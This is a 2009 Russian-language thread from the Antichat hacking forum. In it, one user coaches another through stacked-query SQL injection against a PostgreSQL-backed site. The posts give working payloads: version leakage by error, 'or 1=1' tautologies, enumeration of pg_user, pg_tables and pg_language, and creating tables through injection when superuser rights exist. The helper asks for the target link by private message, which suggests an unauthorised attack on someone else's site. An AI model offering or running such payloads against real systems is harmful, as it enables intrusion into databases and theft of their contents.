ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 05.09.2009, 17:11
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

попробуй
1;select version()::int;SELECT 1 or 1=1
или
1;select version()::int;SELECT 1 from pg_user where 1=1 or 2=2
 
Ответить с цитированием

  #12  
Старый 05.09.2009, 17:24
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Еще вариант, если будет ругаться на отсутсвие таблиц

1;select version()::int;SELECT a.lanname as a.a_id,b.tablename as b.b_id,c.usesysid as c.c_id from pg_language a,pg_tables b,pg_user c where 1=1 or 2=2
 
Ответить с цитированием

  #13  
Старый 05.09.2009, 17:40
Аватар для osnovatel
osnovatel
Новичок
Регистрация: 04.09.2009
Сообщений: 6
Провел на форуме:
10258

Репутация: 1
По умолчанию

>>1;select version()::int;SELECT 1 or 1=1
>>1;select version()::int;SELECT 1 from pg_user where 1=1 or 2=2
да, так же ругается на отсутствие таблиц.

>>SELECT a.lanname as a.a_id,b.tablename as b.b_id,c.usesysid as c.c_id from pg_language a,pg_tables b,pg_user c where 1=1 or 2=2

к сожалению не позволяет определить столбец a.lanname как a.a_id, ругается на точку в алиасе.
Но спасибо за варианты
 
Ответить с цитированием

  #14  
Старый 05.09.2009, 19:24
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Скинь линк в пм, посмотрю что за чудо у тебя
либо пробуй так
select+version()::int;SELECT a.lanname as a_id,b.tablename as b_id,c.usesysid as c_id from pg_language a,pg_tables b,pg_user c where 1=1 or 2=2

Последний раз редактировалось Spyder; 05.09.2009 в 22:23..
 
Ответить с цитированием

  #15  
Старый 05.09.2009, 22:50
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Кстати говоря, если есть права супер юзера, можно создать эти самые таблицы
a_id=1;CREATE TABLE a (a_id int);CREATE TABLE b (b_id int);CREATE TABLE c (c_id int);SELECT version()::int;SELECT a.a_id,b.b_id,c.c_id from a,b,c WHERE 1=1

И вообще очень странно что у тебя не работают мои примеры, т.к. при правильном синтаксисе запросы выполняются по очереди, и конструкция version()::int возвратит ошибку раньше
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ